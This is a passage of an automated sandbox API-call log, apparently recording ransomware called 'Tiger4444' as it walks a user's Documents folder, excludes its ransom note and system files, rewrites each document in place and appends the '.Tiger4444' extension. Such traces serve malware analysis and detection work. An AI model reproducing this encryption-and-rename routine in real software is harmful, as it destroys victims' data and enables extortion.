returned 1 [0046.488] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13794151794) returned 1 [0046.488] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=58840) returned 1 [0046.489] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0046.489] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0046.489] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe8e0, lpName=0x0) returned 0x2c8 [0046.489] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe8e0) returned 0xbe0000 [0046.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0046.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0046.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0046.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0046.490] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13794357877) returned 1 [0046.491] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0046.491] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0046.491] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.491] CloseHandle (hObject=0x2c8) returned 1 [0046.491] CloseHandle (hObject=0x260) returned 1 [0046.495] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\dhSD1u3DH.odt.Tiger4444") returned 49 [0046.495] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\dhSD1u3DH.odt" (normalized: "c:\\users\\fd1hvy\\documents\\dhsd1u3dh.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\dhSD1u3DH.odt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\dhsd1u3dh.odt.tiger4444"), dwFlags=0x1) returned 1 [0046.496] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=58848 | out: Addend=0xc6f980) returned 21063296 [0046.496] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4752 [0046.496] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x624e4e10, ftCreationTime.dwHighDateTime=0x1d4fb88, ftLastAccessTime.dwLowDateTime=0x510a1df0, ftLastAccessTime.dwHighDateTime=0x1d4adf4, ftLastWriteTime.dwLowDateTime=0x510a1df0, ftLastWriteTime.dwHighDateTime=0x1d4adf4, nFileSizeHigh=0x0, nFileSizeLow=0x1eac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dZQ_mjHLDjsbVneC6cd.docx", cAlternateFileName="DZQ_MJ~1.DOC")) returned 1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="Tiger4444.exe") returned -1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2=".") returned 1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="..") returned 1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="windows") returned -1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="bootmgr") returned 1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="pagefile.sys") returned -1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="boot") returned 1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="ids.txt") returned -1 [0046.496] lstrcmpiW (lpString1="dZQ_mjHLDjsbVneC6cd.docx", lpString2="NTUSER.DAT") returned -1 [0046.496] lstrcpyW (in: lpString1=0x30aeadc, lpString2="dZQ_mjHLDjsbVneC6cd.docx" | out: lpString1="dZQ_mjHLDjsbVneC6cd.docx") returned="dZQ_mjHLDjsbVneC6cd.docx" [0046.496] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dZQ_mjHLDjsbVneC6cd.docx", dwFileAttributes=0x0) returned 1 [0046.496] lstrlenW (lpString="dZQ_mjHLDjsbVneC6cd.docx") returned 24 [0046.496] lstrlenW (lpString="Tiger4444") returned 9 [0046.496] lstrcmpiW (lpString1="C6cd.docx", lpString2="Tiger4444") returned -1 [0046.497] lstrlenW (lpString=".dll") returned 4 [0046.497] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0046.497] lstrlenW (lpString=".lnk") returned 4 [0046.497] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0046.497] lstrlenW (lpString=".ini") returned 4 [0046.497] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0046.497] lstrlenW (lpString=".sys") returned 4 [0046.497] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0046.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dZQ_mjHLDjsbVneC6cd.docx" (normalized: "c:\\users\\fd1hvy\\documents\\dzq_mjhldjsbvnec6cd.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.497] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.497] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13795003038) returned 1 [0046.497] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=7852) returned 1 [0046.497] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0046.497] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0046.497] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21b0, lpName=0x0) returned 0x2c8 [0046.497] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21b0) returned 0xbe0000 [0046.498] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.498] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0046.498] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.498] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0046.498] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0046.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0046.499] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13795181334) returned 1 [0046.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0046.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0046.499] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.499] CloseHandle (hObject=0x2c8) returned 1 [0046.499] CloseHandle (hObject=0x260) returned 1 [0046.502] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\dZQ_mjHLDjsbVneC6cd.docx.Tiger4444") returned 60 [0046.502] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\dZQ_mjHLDjsbVneC6cd.docx" (normalized: "c:\\users\\fd1hvy\\documents\\dzq_mjhldjsbvnec6cd.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\dZQ_mjHLDjsbVneC6cd.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\dzq_mjhldjsbvnec6cd.docx.tiger4444"), dwFlags=0x1) returned 1 [0046.502] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=7856 | out: Addend=0xc6f980) returned 21122144 [0046.502] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4754 [0046.502] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2427cf50, ftCreationTime.dwHighDateTime=0x1d4d4a8, ftLastAccessTime.dwLowDateTime=0x6ba79330, ftLastAccessTime.dwHighDateTime=0x1d4d037, ftLastWriteTime.dwLowDateTime=0x6ba79330, ftLastWriteTime.dwHighDateTime=0x1d4d037, nFileSizeHigh=0x0, nFileSizeLow=0x14ce0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EAok5ewOXNobQh.ots", cAlternateFileName="EAOK5E~1.OTS")) returned 1 [0046.502] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.502] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.502] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="Tiger4444.exe") returned -1 [0046.502] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2=".") returned 1 [0046.503] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="..") returned 1 [0046.503] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="windows") returned -1 [0046.503] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="bootmgr") returned 1 [0046.503] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="pagefile.sys") returned -1 [0046.503] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="boot") returned 1 [0046.503] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="ids.txt") returned -1 [0046.503] lstrcmpiW (lpString1="EAok5ewOXNobQh.ots", lpString2="NTUSER.DAT") returned -1 [0046.503] lstrcpyW (in: lpString1=0x30aeadc, lpString2="EAok5ewOXNobQh.ots" | out: lpString1="EAok5ewOXNobQh.ots") returned="EAok5ewOXNobQh.ots" [0046.503] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\EAok5ewOXNobQh.ots", dwFileAttributes=0x0) returned 1 [0046.503] lstrlenW (lpString="EAok5ewOXNobQh.ots") returned 18 [0046.503] lstrlenW (lpString="Tiger4444") returned 9 [0046.503] lstrcmpiW (lpString1="NobQh.ots", lpString2="Tiger4444") returned -1 [0046.503] lstrlenW (lpString=".dll") returned 4 [0046.503] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0046.503] lstrlenW (lpString=".lnk") returned 4 [0046.503] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0046.503] lstrlenW (lpString=".ini") returned 4 [0046.503] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0046.503] lstrlenW (lpString=".sys") returned 4 [0046.503] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0046.503] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\EAok5ewOXNobQh.ots" (normalized: "c:\\users\\fd1hvy\\documents\\eaok5ewoxnobqh.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.503] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.504] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13795663991) returned 1 [0046.504] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=85216) returned 1 [0046.504] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0046.504] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0046.504] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14fe0, lpName=0x0) returned 0x2c8 [0046.504] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14fe0) returned 0xbe0000 [0046.505] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.505] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0046.505] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.506] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0046.506] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.506] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0046.506] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.506] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0046.506] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13795899658) returned 1 [0046.506] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0046.506] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0046.506] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.507] CloseHandle (hObject=0x2c8) returned 1 [0046.507] CloseHandle (hObject=0x260) returned 1 [0046.507] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\EAok5ewOXNobQh.ots.Tiger4444") returned 54 [0046.508] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\EAok5ewOXNobQh.ots" (normalized: "c:\\users\\fd1hvy\\documents\\eaok5ewoxnobqh.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\EAok5ewOXNobQh.ots.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\eaok5ewoxnobqh.ots.tiger4444"), dwFlags=0x1) returned 1 [0046.508] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=85216 | out: Addend=0xc6f980) returned 21130000 [0046.508] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4755 [0046.508] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc543cc90, ftCreationTime.dwHighDateTime=0x1d4f18b, ftLastAccessTime.dwLowDateTime=0x517e4b40, ftLastAccessTime.dwHighDateTime=0x1d49cd7, ftLastWriteTime.dwLowDateTime=0x517e4b40, ftLastWriteTime.dwHighDateTime=0x1d49cd7, nFileSizeHigh=0x0, nFileSizeLow=0xbcd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FJ6mUP3Il.pptx", cAlternateFileName="FJ6MUP~1.PPT")) returned 1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="Tiger4444.exe") returned -1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2=".") returned 1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="..") returned 1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="windows") returned -1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="bootmgr") returned 1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="pagefile.sys") returned -1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="boot") returned 1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="ids.txt") returned -1 [0046.508] lstrcmpiW (lpString1="FJ6mUP3Il.pptx", lpString2="NTUSER.DAT") returned -1 [0046.508] lstrcpyW (in: lpString1=0x30aeadc, lpString2="FJ6mUP3Il.pptx" | out: lpString1="FJ6mUP3Il.pptx") returned="FJ6mUP3Il.pptx" [0046.508] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\FJ6mUP3Il.pptx", dwFileAttributes=0x0) returned 1 [0046.509] lstrlenW (lpString="FJ6mUP3Il.pptx") returned 14 [0046.509] lstrlenW (lpString="Tiger4444") returned 9 [0046.509] lstrcmpiW (lpString1="P3Il.pptx", lpString2="Tiger4444") returned -1 [0046.509] lstrlenW (lpString=".dll") returned 4 [0046.509] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0046.509] lstrlenW (lpString=".lnk") returned 4 [0046.509] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0046.509] lstrlenW (lpString=".ini") returned 4 [0046.509] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0046.509] lstrlenW (lpString=".sys") returned 4 [0046.509] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0046.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\FJ6mUP3Il.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\fj6mup3il.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.509] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.509] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13796226094) returned 1 [0046.509] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=48345) returned 1 [0046.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0046.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0046.509] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbfe0, lpName=0x0) returned 0x2c8 [0046.509] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbfe0) returned 0xbe0000 [0046.511] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.513] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0046.514] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.514] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0046.514] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.514] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0046.514] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.514] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0046.514] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13796720748) returned 1 [0046.514] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0046.514] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0046.514] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.515] CloseHandle (hObject=0x2c8) returned 1 [0046.515] CloseHandle (hObject=0x260) returned 1 [0046.516] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\FJ6mUP3Il.pptx.Tiger4444") returned 50 [0046.516] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\FJ6mUP3Il.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\fj6mup3il.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\FJ6mUP3Il.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\fj6mup3il.pptx.tiger4444"), dwFlags=0x1) returned 1 [0046.516] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=48352 | out: Addend=0xc6f980) returned 21215216 [0046.516] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 4757 [0046.516] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1f3c0, ftCreationTime.dwHighDateTime=0x1d4e683, ftLastAccessTime.dwLowDateTime=0xd12baa70, ftLastAccessTime.dwHighDateTime=0x1d50304, ftLastWriteTime.dwLowDateTime=0xd12baa70, ftLastWriteTime.dwHighDateTime=0x1d50304, nFileSizeHigh=0x0, nFileSizeLow=0x9d85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fsJ8kTuOCLSl-C_JQct.xlsx", cAlternateFileName="FSJ8KT~1.XLS")) returned 1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="Tiger4444.exe") returned -1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2=".") returned 1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="..") returned 1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="windows") returned -1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="bootmgr") returned 1 [0046.516] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="pagefile.sys") returned -1 [0046.517] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="boot") returned 1 [0046.517] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="ids.txt") returned -1 [0046.517] lstrcmpiW (lpString1="fsJ8kTuOCLSl-C_JQct.xlsx", lpString2="NTUSER.DAT") returned -1 [0046.517] lstrcpyW (in: lpString1=0x30aeadc, lpString2="fsJ8kTuOCLSl-C_JQct.xlsx" | out: lpString1="fsJ8kTuOCLSl-C_JQct.xlsx") returned="fsJ8kTuOCLSl-C_JQct.xlsx" [0046.517] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\fsJ8kTuOCLSl-C_JQct.xlsx", dwFileAttributes=0x0) returned 1 [0046.517] lstrlenW (lpString="fsJ8kTuOCLSl-C_JQct.xlsx") returned 24 [0046.517] lstrlenW (lpString="Tiger4444") returned 9 [0046.517] lstrcmpiW (lpString1="JQct.xlsx", lpString2="Tiger4444") returned -1 [0046.517] lstrlenW (lpString=".dll") returned 4 [0046.517] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0046.517] lstrlenW (lpString=".lnk") returned 4 [0046.517] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0046.517] lstrlenW (lpString=".ini") returned 4 [0046.517] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0046.517] lstrlenW (lpString=".sys") returned 4 [0046.517] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0046.517] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\fsJ8kTuOCLSl-C_JQct.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fsj8ktuoclsl-c_jqct.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.517] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.517] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13797039030) returned 1 [0046.517] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=40325) returned 1 [0046.517] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0046.517] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0046.517] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa090, lpName=0x0) returned 0x2c8 [0046.518] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa090) returned 0xbe0000 [0046.519] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.519] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0046.519] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.519] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0046.519] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.519] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0046.519] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.519] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0046.519] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13797255782) returned 1 [0046.520] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0046.520] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0046.520] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.520] CloseHandle 